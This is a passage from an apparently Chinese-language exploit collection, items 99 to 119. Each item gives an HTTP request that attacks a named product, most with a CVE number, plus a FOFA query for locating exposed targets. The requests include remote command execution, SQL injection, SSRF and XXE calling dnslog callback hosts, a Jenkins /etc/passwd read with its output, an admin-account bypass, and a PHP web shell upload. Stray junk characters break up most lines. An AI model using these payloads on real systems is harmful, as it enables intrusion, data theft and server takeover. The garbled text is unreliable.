7 F Y. `5 n ^9 d8 @0 }( `Connection: close
+ w: `! f0 P, |3 `" JContent-Length: 121* e, o) x- ]0 S
Accept: */*9 U9 T5 K% V+ |$ s( ^% |0 [
Accept-Encoding: gzip, deflate7 w+ r& f6 z( ] k6 S. [6 Z0 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 J2 b6 R5 A* {
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
1 S% [; v2 v6 m. C1 ~7 a c+ g) O5 ]X-Requested-With: XMLHttpRequest% S" p. U t7 D2 i$ a ^) F
- n% h$ q" ^4 ]) m# l
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
1 M/ f f1 N- u( D2 W4 W0 o& T" }7 p
8 P# q) O% \, T" U0 O, _# x) h" e6 m1 ^: Z( C* c8 U0 e @& Z, j
99. Ncast盈可视高清智能录播系统busiFacade RCE; d7 V+ r- H5 O& I
CVE-2024-0305
7 V+ }! {. z% \% [1 E+ c8 ~, `FOFA:app="Ncast-产品" && title=="高清智能录播系统"
& L D( C' t; R) @POST /classes/common/busiFacade.php HTTP/1.18 J( C y" D7 f; |3 ]6 ?
Host: 192.168.40.130:80807 D. a# Z# J" |3 k' R1 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 U4 u$ Z* A i; T; E: iConnection: close
6 |+ f0 [3 O9 U) @Content-Length: 154! r! y9 f b, j5 K/ x) J
Accept: */*" j$ P; Z( C$ @& t
Accept-Encoding: gzip, deflate+ K$ g4 b$ V& ~4 r+ s" q9 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 d7 ]( O1 p# M" J) RContent-Type: application/x-www-form-urlencoded; charset=UTF-81 J' W0 F* A2 z1 [! K
X-Requested-With: XMLHttpRequest
$ k. X8 l }, h/ {* D3 S% E/ k4 |. A. X. D4 k" z2 m
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
; z, \! _, f% C4 {; u5 z* A' M5 v- h* P9 \2 N9 ^, b x8 m
4 k5 `) q- }$ o3 W5 @& t
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& @( \5 T5 p0 E0 n1 B, s
CVE-2024-0352" k" ]. _; z! Y; T k& F" e, s3 S
FOFA:icon_hash="874152924"# _$ b: V o9 s0 J! N2 k2 R7 B
POST /api/file/formimage HTTP/1.18 e. @. X/ R! B8 o _; Q* z& C) I9 L5 ^
Host: 192.168.40.130; U* W; b* G% l' b% _
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" p z" V8 S5 j1 ~6 G5 ^7 C SConnection: close
5 Y1 Y% ~8 ~( K' h2 I+ MContent-Length: 2011 j7 V$ e* v8 e' b( p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei+ N; A ?# P1 \0 j2 |
Accept-Encoding: gzip2 H3 ?) t# b F9 |% _% m
& P9 t- F9 }% M2 P
------WebKitFormBoundarygcflwtei- N' h; U- z ^2 R, Z. _8 i
Content-Disposition: form-data; name="file";filename="IE4MGP.php"3 x5 V+ t9 e6 ~' E1 ^3 `
Content-Type: application/x-php, W8 F" d; [" g/ ?# @ j2 G
9 p( f% U* q9 U; i& a0 z0 R; K2ayyhRXiAsKXL8olvF5s4qqyI2O$ C# F, z% ?( }/ D2 p$ R3 ]
------WebKitFormBoundarygcflwtei--; q! N! _6 a% _5 ~$ H
2 p0 |; B+ g! r- j. _9 x7 o8 q8 a% v8 E. U5 Y' N
101. ivanti policy secure-22.6命令注入! G$ T: f1 ~& d) F8 j
CVE-2024-21887 }! Z6 D& G( N: J: B9 d% R3 ~% {
FOFA:body="welcome.cgi?p=logo"7 P, \% R3 E: I! A
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
7 D, x0 f7 a3 T) E5 m1 g9 MHost: x.x.x.xx.x.x.x ^+ g: l' }, u1 j8 u6 I8 e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; u ~+ [2 [ {' F' ` P7 uConnection: close$ {. D R+ p& N/ q6 d
Accept-Encoding: gzip/ h+ @) _. f1 M' R* W
' k* E. A2 u6 o# T3 ?. }% R6 H
1 k; Q* d) k2 X7 y7 ^102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行) o. S4 p" @. G. d* w& Z) K% V/ r' D9 G
CVE-2024-21893
; D- ~. w2 a8 k8 Q+ ~1 r) cFOFA:body="welcome.cgi?p=logo"6 \2 n; T7 z3 q$ N+ O0 W; j9 d" A
POST /dana-ws/saml20.ws HTTP/1.1
) k5 j& ^' |6 u/ z+ T# {Host: x.x.x.x
- R6 S A, S ^. C! e9 {3 ]' ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! s: u' ~! T4 @Connection: close- q2 w7 f, G% R$ H% o1 @! x
Content-Length: 792
0 @, ?+ K( z$ d8 o- `Accept-Encoding: gzip
+ j) z1 ?; l, c [( P0 d# t4 a9 S) z3 u! |- k& u& N1 s
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
$ ]; r C$ {: M3 W$ {* {7 A0 e3 r# W* C+ F, L: b2 d' p2 N
103. Ivanti Pulse Connect Secure VPN XXE
, ?' }( K5 g/ X1 B* tCVE-2024-22024: L/ s7 S. P4 s' W
FOFA:body="welcome.cgi?p=logo"
2 P% x& Q. d" k$ C- XPOST /dana-na/auth/saml-sso.cgi HTTP/1.1( Q+ S1 u# u% K% z' \4 K
Host: 192.168.40.130:111
8 R& Z7 E3 I; v5 O' @User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
; W' p8 ?% _, x9 [" G2 E( h0 [3 j dConnection: close+ z6 S) f) y2 i' l2 W% G
Content-Length: 2040 q* z: V% s' A5 [$ l4 p
Content-Type: application/x-www-form-urlencoded
& c4 M! e4 w0 {; S0 C! XAccept-Encoding: gzip
0 K2 o0 e* _3 X7 o
" z& \- }/ F6 J1 t7 q4 Y, s0 Y/ hSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
! u* I( z0 J: W$ |, k( [- g' `% E* p
/ c) C8 x" @8 Q6 g: _. Q
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下0 w4 F& V8 }! ~1 V
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
2 C- Q) b' r- `2 j) L3 F6 @$ T) N& _6 ?& K5 e
2 {- h; T# y; {' y- @) r2 @104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露. e" P l/ `$ F0 c5 g
CVE-2024-0569$ f( o$ b, Q% V6 ?8 k3 ` ]
FOFA:title="TOTOLINK"
) @6 K7 i4 ]1 |: ^" R8 v' l# uPOST /cgi-bin/cstecgi.cgi HTTP/1.1
; {, o3 t- P% }; ZHost:192.168.0.1, Q' d" M7 q* ^
Content-Length:417 F6 R, @) j7 k; G- b
Accept:application/json,text/javascript,*/*;q=0.015 f1 R3 P y1 B
X-Requested-with: XMLHttpRequest0 X/ h) s& W& A3 S0 v5 p U% W3 r+ l
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36& ~$ s5 g7 x+ w3 C2 W* {
Content-Type: application/x-www-form-urlencoded:charset=UTF-88 O0 o8 ^( b# E/ R! M" v
Origin: http://192.168.0.1
! b6 R& M$ u j+ j' \Referer: http://192.168.0.1/advance/index.html?time=1671152380564
6 l& x8 f" d; e; KAccept-Encoding:gzip,deflate) e1 n2 |9 f3 B# @4 ^ j
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.79 u1 J: V' P8 C' Y: ?
Connection:close% B! H7 G5 Y& p! f) z
9 E2 G1 b+ H3 }9 W1 U' C6 k
{% F D1 j( T1 o+ M
"topicurl":"getSysStatusCfg",
( M# ]0 P' p* m5 o"token":""
8 y7 S- Q0 Y/ ?}
+ ?0 x7 i. K8 ^* Q4 j- _6 }/ K) E: d. Y d0 u! N) d1 @ ]
105. SpringBlade v3.2.0 export-user SQL 注入
, z6 L% G4 O2 @4 r' l0 PFOFA:body="https://bladex.vip"
: H. f: g' t( \3 r+ c. \0 Y# h% {http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
* a0 C3 ^7 b5 e) V {% K# L( R5 w8 [7 M+ x
106. SpringBlade dict-biz/list SQL 注入8 p6 `2 M( A1 I. x5 J
FOFA:body="Saber 将不能正常工作"
" O% |% t5 p C: a! d7 X# LGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.17 r/ Q9 x8 z% U7 Q" |! E+ B" M
Host: your-ip
5 ~+ S( ]3 ]3 w" S& c3 O9 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" M1 }9 J$ j+ B$ B+ tBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A9 {2 x' b, u" i4 |
Accept-Encoding: gzip, deflate
, o0 _. v2 b! D4 G+ FAccept-Language: zh-CN,zh;q=0.9) K) }, @5 k `) L8 c, d r
Connection: close
$ q6 c9 Z2 ]) E
) o! w8 F/ y1 v+ A" z
; c3 \2 e7 W D$ C/ }9 ~: Z4 j107. SpringBlade tenant/list SQL 注入
. H5 g: J( j0 l: F' O; {9 q8 z# }: uFOFA:body="https://bladex.vip"5 ~7 P* [1 z$ h7 p C' O9 |# t
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.16 m8 W, M! B3 v
Host: your-ip/ b1 _( n8 f: b* D0 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 i8 c2 Y b o9 O- n" d0 G
Blade-Auth:替换为自己的4 N3 z4 Q6 M' e' k: r" b" T* f; F
Connection: close2 J/ a! o. v r/ O; i
: B5 Q. j: g8 Y, L* k: _2 J! J3 D, H |1 U0 ~+ P9 k H$ F
108. D-Tale 3.9.0 SSRF
% l6 S1 l+ J+ o: `2 e4 A9 D5 u( K* s9 i+ zCVE-2024-21642
0 k" y0 H8 E i3 [+ u' i9 KFOFA:"dtale/static/images/favicon.png"
2 i. z: Y e. D4 ]! H+ D4 _1 vGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
2 ^# ?' Q- H- d6 R$ n! Y0 VHost: your-ip( @' g+ z; s8 ~$ U6 [
Accept: application/json, text/plain, */*( a0 \( E, o. o5 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 q1 ~* h8 k! x: R
Accept-Encoding: gzip, deflate
, P: Z) u( F+ O' r1 m7 Q" QAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 A& u/ G4 O/ Y: D) ^4 e% V$ JConnection: close) {3 X, Y3 t) {& q
5 ?# v# X: D3 [. h% z$ V* [6 M" {5 c7 S7 Q0 V9 Z; M2 q. P; e
109. Jenkins CLI 任意文件读取4 J5 p3 v* W% a% {0 T: n& m T
CVE-2024-23897% Q r3 Y' T+ K: Y
FOFA:header="X-Jenkins"( i; L2 W @, O6 V4 d8 T
POST /cli?remoting=false HTTP/1.1, T/ {& H$ }) B. c4 f: N9 U& i
Host:
6 f# f5 j: c9 R ~' C9 yContent-type: application/octet-stream: D% P' b7 Z9 P; p1 |/ q: d4 u
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
# c# l) i% i! x+ E8 T6 LSide: upload C1 q* J2 o, f
Connection: keep-alive5 }+ I x8 a" j& {
Content-Length: 1632 \8 _# I" R! \
4 }. w( _& K9 V1 ^: s7 db'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'; c, i1 t! Y' n5 Z
, }9 b; ^# v3 g+ {
0 {9 z# j7 q. S( Z% ~9 `3 t$ l
POST /cli?remoting=false HTTP/1.11 }! f& ^* w3 [. m; `) Y, K
Host:
$ {5 G( N( B3 C5 G$ n' V! KSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
- u u+ L' _1 A# ?, \7 Fdownload; n# z0 e& @5 ?! [
Content-Type: application/x-www-form-urlencoded: N5 R- F- \" M! k) x- A
Content-Length: 0& }& C. }( M: @# [. O+ K& F* I, a2 e
8 ^+ _. j% l% [. s$ S H# U/ i
1 i' o5 }& t- R' Z$ uERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin4 Y4 c. n* ^7 D- B% A
java -jar jenkins-cli.jar help; Z) s' A( Q9 ^/ d# s* f% K
[COMMAND]# O' h) A8 ^2 O- M- d1 ?
Lists all the available commands or a detailed description of single command., e* k1 n- `9 u0 X
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)- h' m |3 W- F3 H
2 [: ^- d4 K* k% n' F6 X
) Z/ R) O* C3 E9 w8 \4 ]# m; s
110. Goanywhere MFT 未授权创建管理员& f8 O6 N3 k7 j( {. Q
CVE-2024-0204! z8 Y0 P) _8 Y2 |: n
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"0 ~3 ]3 a4 `# K% ^
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.14 i' \/ q3 H" o; R2 W' o' C
Host: 192.168.40.130:80003 p: F# i" z" ]3 p f; `
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
" V/ b# x" l! v! x* rConnection: close' z# q! X- g" k/ H" }& L9 R- v
Accept: */*9 R7 N7 t2 A' |/ I( s% J% x4 R
Accept-Language: en
/ O# N7 E% d$ G7 K# e) _Accept-Encoding: gzip
; ^/ C6 I* i3 N* X0 p8 [
' p$ v; S: \3 F5 J$ O4 C7 b9 e
6 G5 b. G, k$ I! k: F3 i111. WordPress Plugin HTML5 Video Player SQL注入
# n3 n4 f3 S% Q& r Y9 jCVE-2024-10617 T# P( _/ B! B
FOFA:"wordpress" && body="html5-video-player"& Z* [9 h" f# g% J1 D7 A
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
$ b/ E; I& F% F' D' eHost: 192.168.40.130:112
% b2 M' r; q& r$ K% Q+ jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 X* X0 M/ }; l9 v PConnection: close
3 x1 y) w( s8 A% m: kAccept: */*3 Y5 I+ r ~. ?/ U
Accept-Language: en. M$ C/ H% Q4 d. ^6 Z) Z
Accept-Encoding: gzip, X: ^. n9 E f o
1 k7 Y; D/ N) v0 j6 I: c* ^; R. ~
& ]1 q2 `- n/ j. S/ r+ X
112. WordPress Plugin NotificationX SQL 注入
5 n, R4 c5 K8 w& |7 cCVE-2024-1698
3 U6 ?( Z$ U* D) F% h VFOFA:body="/wp-content/plugins/notificationx"1 ]3 i% _( {' E" T
POST /wp-json/notificationx/v1/analytics HTTP/1.1' N- {: k b9 ~6 S% \
Host: {{Hostname}}* j: X8 ]3 D- m/ F" K0 F# Q, G
Content-Type: application/json$ n6 c2 c- ~% W$ i8 s! o
1 Y6 B! X: ]- C2 y3 N" T2 G
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
5 j S$ ]7 G2 B. f2 {' y: q6 k0 {
6 K& f+ M4 W; u( Q' T% q) s/ C113. WordPress Automatic 插件任意文件下载和SSRF0 C" T7 S& h1 x" c/ O% `
CVE-2024-27954
" R& D) a: `! q( ^* n2 uFOFA:"/wp-content/plugins/wp-automatic"2 O4 E# N* \& [8 u! D, k; _
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1: i( \0 ]2 K% w' ^
Host: x.x.x.x* D& ?6 ?6 v2 K% R L
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
) {6 y/ V0 F$ [. f6 G% ~, b! yConnection: close5 V) m i! w8 L4 [, C
Accept: */*
" r9 Y: j' `' U8 o1 U( j3 g- n: A* PAccept-Language: en8 n3 T" l# f6 u1 u. H$ x
Accept-Encoding: gzip
5 t! s5 Z9 s/ \7 [, d2 {! ^/ F* }+ K- `0 ?( K0 s% d% V
( Y+ K( s2 c; U$ U' I+ P
114. WordPress MasterStudy LMS插件 SQL注入
0 n6 ]/ e/ J5 j5 R: B, [; WFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"3 R5 H8 X9 j& K# e5 R& Y4 }; L7 U
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
& D" A6 o& F7 CHost: your-ip8 ^8 c: N. O6 a: p9 U- f6 \ `) p
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
$ c+ ^0 `- z' ?8 ]# p9 pAccept-Charset: utf-8
" N/ i0 `! d: FAccept-Encoding: gzip, deflate' x4 N5 `$ a* A; c S
Connection: close
+ {7 C/ z( m2 k& W9 S8 `2 R" @! L$ a, \. C) ~
) n7 _; H8 r+ q
115. WordPress Bricks Builder <= 1.9.6 RCE
& |2 q% V! W" i) W4 P& d0 a$ \CVE-2024-25600/ E: }1 z4 [9 y+ p# r& \, O
FOFA: body="/wp-content/themes/bricks/"( g& I" B; T6 ` i) ~
第一步,获取网站的nonce值
: D" D# r) [ k5 P3 jGET / HTTP/1.1
) e+ o; E b; k- S$ \8 j" IHost: x.x.x.x' Z% H# B3 s/ J5 k) }9 N' q( ?
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
2 W4 R \: ~8 VConnection: close$ P* n- {+ l) F0 \
Accept-Encoding: gzip# Z3 g4 g' G" g0 h, m( a7 c" V
+ V& i& W! m, k+ }/ t
9 X. L& M' \, S! I+ S, U" j* D第二步替换nonce值,执行命令
2 Q j2 ?$ X' H( e2 [. m6 kPOST /wp-json/bricks/v1/render_element HTTP/1.12 K* k2 K) E* }5 l
Host: x.x.x.x3 h: M; y/ J5 d7 Y' C$ O6 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 O: V# G: |9 {( `7 J- DConnection: close9 C8 m) @- h8 Y$ f
Content-Length: 3563 M6 S/ R+ Y: q% v% P
Content-Type: application/json
2 K8 g0 G D4 i5 E6 hAccept-Encoding: gzip
; ^7 B- K4 S" k1 C$ u7 z' z" c5 {1 y" h+ \+ w& n6 a# V" g
{
" u1 s! z+ M) Q8 O"postId": "1",
% _2 Y5 A! y0 d3 G% k* r "nonce": "第一步获得的值",
9 T0 M* H* X$ m' s6 o "element": {/ f7 u% Y/ y4 K
"name": "container",0 f; h+ ]7 v, }5 d6 p5 v, z9 y
"settings": {
+ v7 ~1 t( [, i- } "hasLoop": "true",4 E5 E8 ^3 u. c1 H
"query": {; g4 N' b$ \) C1 i7 V3 K- k
"useQueryEditor": true,
+ b4 S- _1 u) R% S "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
6 d: L3 k- q$ A0 V: S7 Z "objectType": "post"
) D: |! o0 c: C' f4 g }
7 F/ O" O! Z4 w6 ^" c }3 r9 h' q+ Y+ o: G
}
1 `* @$ C3 ]2 N ^7 j3 C}
" b8 G% N5 c' t! a: K9 y3 u/ ~
* o" _. l* n1 ?# w( X8 X: Q% ?* @: A; D# @) ^2 g
116. wordpress js-support-ticket文件上传0 ?0 s$ Q' ^+ o# I" \" Q% }
FOFA:body="wp-content/plugins/js-support-ticket"
& E0 t" p0 L+ e- uPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
8 S) h) k8 E4 z/ i' V9 x" PHost:& i' X% i) U* b/ T" t1 n$ L! A
Content-Type: multipart/form-data; boundary=--------767099171
* q1 s; ]+ m6 r0 m8 o, M3 U( MUser-Agent: Mozilla/5.05 @9 L% h: t( Q) B0 W7 s- O" j
2 L3 { l1 H! m% W% `0 H
----------7670991717 L& N3 P& i" @8 I r( u6 c8 U
Content-Disposition: form-data; name="action"3 H0 ]. [# m0 O4 P. U; b; L: P7 Z
configuration_saveconfiguration
! `: w* v" K) ~6 A M----------767099171+ @; N4 @5 r# c7 Q+ u" w2 t
Content-Disposition: form-data; name="form_request") `! Q* D4 u4 h: e: X4 Y
jssupportticket+ ~7 ~$ p' x Y
----------767099171
' ]7 g; ]8 x9 h: r* c/ TContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"! K0 Z* E9 [: V- ^7 i. S
Content-Type: image/png
& ]' S. t8 c* H6 ?. M# f# O3 a B----------767099171--
! o9 q! V! D/ e! s0 H
) `$ C6 E$ t' T% U
% i, u$ H" {. ~- ^# }117. WordPress LayerSlider插件SQL注入
& e7 W3 D- [5 n# ^0 n/ ^version:7.9.11 – 7.10.0
: r6 Y. G# g0 J% ^/ Q9 vFOFA:body="/wp-content/plugins/LayerSlider/"0 u4 l8 k X; |8 [, A6 [7 ?
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
- w' c# O/ _0 iHost: your-ip
8 v/ s' s' L5 @" B, PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' V" ?# W! P) u4 v. C* M" O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( z H' D4 t, {) qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 d' y2 I, p! u; [; m
Accept-Encoding: gzip, deflate, br R A# J% A5 Q. {( \$ S( Z0 \
Connection: close
7 V! V5 z0 b5 L+ ]Upgrade-Insecure-Requests: 1
w* k& i2 M) y# Q7 f; w( |) R" E: i: C% v+ y1 e
* M% a4 F7 P9 H+ x
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传- C6 O. q; W9 s* h+ R
CVE-2024-0939( |: z; b x3 U; T) t) a9 f6 e7 X
FOFA:title="Smart管理平台"
& R4 f) T3 Q. q0 h) J1 v* ]POST /Tool/uploadfile.php? HTTP/1.1
5 {- q! L0 ?6 m" aHost: 192.168.40.130:8443. z: C& B! w$ l% A* K% P1 Y
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f81 h8 u# w2 G% H9 H1 A& g4 W) E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
2 T& p$ s( s# } k- hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ o/ N0 E# J. G) Z/ g9 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- k9 M0 }. J0 N; tAccept-Encoding: gzip, deflate" f# i; c; C. v! p: c
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
- y& X' A3 L5 ?Content-Length: 405' j2 L% B) N- H7 O6 |
Origin: https://192.168.40.130:84439 m/ G- b+ C5 @3 f; R
Referer: https://192.168.40.130:8443/Tool/uploadfile.php# O! u+ g+ \( W# T, c
Upgrade-Insecure-Requests: 1
/ P9 b; L L( S. g9 YSec-Fetch-Dest: document
1 Q8 k$ K* l* T L& qSec-Fetch-Mode: navigate) r' l+ y& e: T$ X1 ]7 d" o6 R1 _
Sec-Fetch-Site: same-origin3 t) R5 d# c/ B" x' y+ j6 X2 m) m
Sec-Fetch-User: ?1
$ W5 C2 y( Q7 l7 E& MTe: trailers
# I2 u, O% K; D' MConnection: close
4 a% o" J6 v/ Y+ s- j, m9 F# g9 r8 n) u/ z- @; S
-----------------------------13979701222747646634037182887
! X0 }. ` |2 o" dContent-Disposition: form-data; name="file_upload"; filename="contents.php"( k+ P8 V) H- Y- H3 D) [
Content-Type: application/octet-stream
5 p. a) r4 G3 ~1 g1 Q) f& r) \
- D% _& s3 m( {8 f<?php$ R- M3 F' S& {; @$ c
system($_POST["passwd"]);
2 i ^6 [3 v6 l q" x- w2 V4 I Y {?>% C! f, E7 y+ Y9 F7 t
-----------------------------13979701222747646634037182887
7 F5 r9 Y/ P4 {! @9 i W) y3 }Content-Disposition: form-data; name="txt_path"8 ^7 _1 M# N7 w* K. O
7 w8 S7 h4 u6 P; K" ]: @5 N4 |/home/src.php3 n9 J; _2 l0 }% y
-----------------------------13979701222747646634037182887--
# l0 g( j1 G+ E- \6 X* d
* }6 m( m1 Y8 K+ g1 ~% f
4 t) u; u5 _3 F' }4 l0 W* O) @访问/home/src.php
2 a) W" x b& n' K9 P2 j# N9 n. I; e6 Z2 J- U- d: M, u
119. 北京百绰智能S20后台sysmanageajax.php sql注入# @$ s4 G! ?& `+ t. i2 t: @
CVE-2024-1254
T. H$ W/ W0 D2 w; j; u) JFOFA:title="Smart管理平台"9 \. ~% a9 |) n- P
先登录进入系统,默认账号密码为admin/admin! H2 i# M; p' M8 b) f% P; Z
POST /sysmanage/sysmanageajax.php HTTP/1.11
2 I8 L/ T6 U) B* Z% hHost: x.x.x.x
3 C l7 v- B/ u: CCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee: X9 p& d3 H: z6 p8 h3 Z- X0 L, {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0& Y1 o$ @" X5 u& `' a! k
Accept: */*
2 S# i5 j% t% L. f# fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ A: N+ g. G9 m! N2 a, B7 m
Accept-Encoding: gzip, deflate# {9 a, r! G3 @3 W9 `
Content-Type: application/x-www-form-urlencoded;7 z+ k" o4 U5 u0 ]! ?8 |7 r9 d
Content-Length: 1096 ` _( ^7 y: a. u/ j6 j7 d! U
